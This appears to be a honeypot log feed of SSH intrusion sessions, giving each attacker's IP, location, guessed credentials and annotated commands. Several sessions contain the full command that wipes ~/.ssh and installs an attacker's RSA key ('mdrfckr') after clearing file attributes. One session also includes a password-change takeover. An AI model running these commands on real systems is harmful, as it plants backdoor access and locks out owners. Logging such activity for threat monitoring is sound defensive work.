$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ grumpy_mekong_root (103.189.208.13) โ€” Sฦกn Trร , Vietnam ยท 1 session ยท 2 cmds
2026-07-02 23:49 EDT ยท as oracle/1qa2ws3ed
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ rogue_panda_root_222 (124.174.36.222) โ€” Haidian, China ยท 1 session ยท 1 cmd
2026-07-02 22:47 EDT ยท as root/123456
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -m
๐ŸŽญ nocturnal_wok_root_189 (101.96.202.189) โ€” Haidian, China ยท 1 session ยท 1 cmd
2026-07-02 20:03 EDT ยท as root/123456
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -m
๐ŸŽญ sneaky_durian_root (51.79.143.228) โ€” Singapore, Singapore ยท 32 sessions ยท 32 cmds
2026-07-02 15:29 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—32
๐ŸŽญ cryptic_orchid_root (139.99.74.35) โ€” Singapore, Singapore ยท 1 session ยท 1 cmd
2026-07-02 17:08 EDT ยท as root/root
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a && echo "====" && cat /etc/os-release
๐ŸŽญ savage_phantom_root (91.92.40.11) โ€” Varna, Bulgaria ยท 52 sessions ยท 213 cmds
2026-06-12 17:35 EDT ยท as admin/123456, admin/admin, admin/admin123
Export PATH modification โ†’ OS fingerprinting via uname variants (system, version, hostname, architecture, release) โ†’ kernel version extraction from /proc/version โ†’ uptime verification via /proc/uptime โ†’ hardware profiling completion.
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E "model name|Hardware" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep "Model name"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; echo '===DONE===' ) 2>&1 ); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output"; echo "FILTER:$filter_output" ร—4
$ uname -s -v -n -m 2 > /dev/null ร—47
$ /bin/uname -s -v -n -m 2 > /dev/null ร—4
$ /usr/bin/uname -s -v -n -m 2 > /dev/null ร—4
$ busybox uname -s -v -n -m 2 > /dev/null ร—4
$ ( [ -f /proc/version ] ร—4
$ [ -f /proc/version ] ร—4
$ head -1 /proc/version | cut -d -f1 ร—4
$ [ -f /etc/os-release ] ร—4
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ร—43
$ uname -m 2 > /dev/null ร—43
$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ร—43
$ uname -s -v -n -r -m ร—5
๐ŸŽญ murky_liberty_root_26 (4.150.201.26) โ€” Des Moines, United States ยท 1 session ยท 2 cmds
2026-07-02 13:16 EDT ยท as oracle/oracle123456
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ placid_cipher_root (91.92.40.4) โ€” Varna, Bulgaria ยท 44 sessions ยท 116 cmds
2026-06-18 18:14 EDT ยท as admin/123456, admin/admin, admin/admin123
echo โ†’ export โ†’ uname โ†’ cat (repeated export 24x)
$ echo $HOME ร—20
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ร—24
$ uname -s -v -n -m 2 > /dev/null ร—24
$ uname -m 2 > /dev/null ร—24
$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ร—24
๐ŸŽญ gnarled_husk_crypto (217.170.194.91) โ€” Oslo, Norway ยท 4 sessions ยท 4 cmds
2026-07-02 11:22 EDT ยท as bitcoin/bitcoin, eth/eth
echo
$ echo "test" ร—4
๐ŸŽญ rusty_eagle_root_49 (92.118.39.49) โ€” Dallas, United States ยท 3 sessions ยท 27 cmds
2026-07-02 11:25 EDT ยท as root/1234, root/123456, root/12345678
export PATH manipulation โ†’ uname -s -v -n -m system enumeration via multiple binary paths โ†’ /proc/version kernel check โ†’ /etc/os-release detection
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E "model name|Hardware" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep "Model name"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; echo '===DONE===' ) 2>&1 ); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output"; echo "FILTER:$filter_output" ร—3
$ uname -s -v -n -m 2 > /dev/null ร—3
$ /bin/uname -s -v -n -m 2 > /dev/null ร—3
$ /usr/bin/uname -s -v -n -m 2 > /dev/null ร—3
$ busybox uname -s -v -n -m 2 > /dev/null ร—3
$ ( [ -f /proc/version ] ร—3
$ [ -f /proc/version ] ร—3
$ head -1 /proc/version | cut -d -f1 ร—3
$ [ -f /etc/os-release ] ร—3
๐ŸŽญ molten_abba_root (45.198.224.46) โ€” Stockholm, Sweden ยท 49 sessions ยท 49 cmds
2026-06-18 00:23 EDT ยท as admin/123456, admin/admin, admin/admin123
echo
$ echo OK ร—49
๐ŸŽญ sneaky_dimsum_root (152.32.254.222) โ€” Hong Kong, Hong Kong ยท 13 sessions ยท 13 cmds
2026-07-02 06:03 EDT ยท as admin/admin, admin/admin123, admin/password
Ran uname 2x across 2 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—13
๐ŸŽญ zealous_seoul_root (47.80.20.223) โ€” Seoul, South Korea ยท 32 sessions ยท 32 cmds
2026-07-02 05:48 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—32
๐ŸŽญ rusty_lantern_root (180.184.176.148) โ€” Haidian, China ยท 2 sessions ยท 2 cmds
2026-07-02 06:31 EDT ยท as guest/guest, root/1234
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—2
๐ŸŽญ silent_moose_root (67.71.55.209) โ€” North York, Canada ยท 1 session ยท 2 cmds
2026-07-02 06:20 EDT ยท as oracle/oracle@2025
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ molten_bamboo_root (27.71.230.31) โ€” Hanoi, Vietnam ยท 9 sessions ยท 9 cmds
2026-06-23 18:25 EDT ยท as root/1234, root/123456, root/P@ssw0rd1!
ssh โ†’ OS/kernel identification โ†’ hostname discovery โ†’ uptime check โ†’ mount (repeated hostname discovery 4x)
$ ssh -V
$ uname -a ร—2
โ†ณ OS/kernel identification
$ hostname ร—4
โ†ณ hostname discovery
$ uptime
โ†ณ uptime check
$ mount | head -5
๐ŸŽญ glitchy_kopi_root (118.194.234.8) โ€” Singapore, Singapore ยท 2 sessions ยท 4 cmds
2026-06-13 10:37 EDT ยท as oracle/Oracle@2024, oracle/oracle@2025
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh ร—2
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ร—2
โ†ณ SSH key persistence
๐ŸŽญ sneaky_neon_root (45.249.247.86) โ€” Hong Kong, Hong Kong ยท 1 session ยท 2 cmds
2026-07-02 06:13 EDT ยท as oracle/oracle@2025
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ spectral_dimsum_root (103.43.191.43) โ€” Kwai Chung, Hong Kong ยท 1 session ยท 2 cmds
2026-07-02 06:06 EDT ยท as oracle/oracle@2025
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ derelict_jollof_root (102.88.137.213) โ€” Lagos, Nigeria ยท 1 session ยท 2 cmds
2026-07-02 04:13 EDT ยท as oracle/oracle123#
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ sullen_nomad_root (201.184.50.251) โ€” Bogotรก, Colombia ยท 1 session ยท 2 cmds
2026-07-02 04:04 EDT ยท as oracle/oracle123#
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ sullen_windmill_root (45.156.87.166) โ€” Eygelshoven, The Netherlands ยท 31 sessions ยท 31 cmds
2026-07-02 02:14 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 2x across 2 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—31
๐ŸŽญ lurking_matador_root (200.234.227.140) โ€” Barcelona, Spain ยท 8 sessions ยท 8 cmds
2026-07-01 00:37 EDT ยท as root/12345678, root/admin, root/toor
echo (repeated echo 4x)
$ echo SHELL_TEST ร—8
๐ŸŽญ jittery_void_root_5 (65.109.165.5) โ€” Helsinki, Finland ยท 1 session ยท 2 cmds
2026-07-01 23:53 EDT ยท as oracle/1qaz!QAZ
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ savage_yankee_root_214 (43.162.108.214) โ€” Santa Clara, United States ยท 1 session ยท 2 cmds
2026-07-01 23:34 EDT ยท as oracle/1qaz!QAZ
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ wily_windmill_root (2.57.122.209) โ€” Amsterdam, The Netherlands ยท 3 sessions ยท 3 cmds
2026-07-01 22:40 EDT ยท as root/1234, root/123456, root/12345678
echo
$ echo $HOME ร—3
๐ŸŽญ venomous_silk_root (14.29.214.161) โ€” Shenzhen, China ยท 1 session ยท 2 cmds
2026-07-01 22:28 EDT ยท as oracle/oracle2025
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ vapor_dragon_root_198 (120.230.180.198) โ€” Guangzhou, China ยท 1 session ยท 20 cmds
2026-07-01 22:18 EDT ยท as oracle/oracle!
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "oracle!\ndVr84cg7iZr7\ndVr84cg7iZr7"|passwd|bash
$ Enter new UNIX password:
$ echo "oracle!\ndVr84cg7iZr7\ndVr84cg7iZr7\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ murky_panda_root_86 (103.236.75.86) โ€” Beijing, China ยท 1 session ยท 5 cmds
2026-07-01 21:23 EDT ยท as root/123456
echo โ†’ payload download from C2 โ†’ execute from /tmp โ†’ '8
$ echo 1 > /dev/null && cat /bin/echo
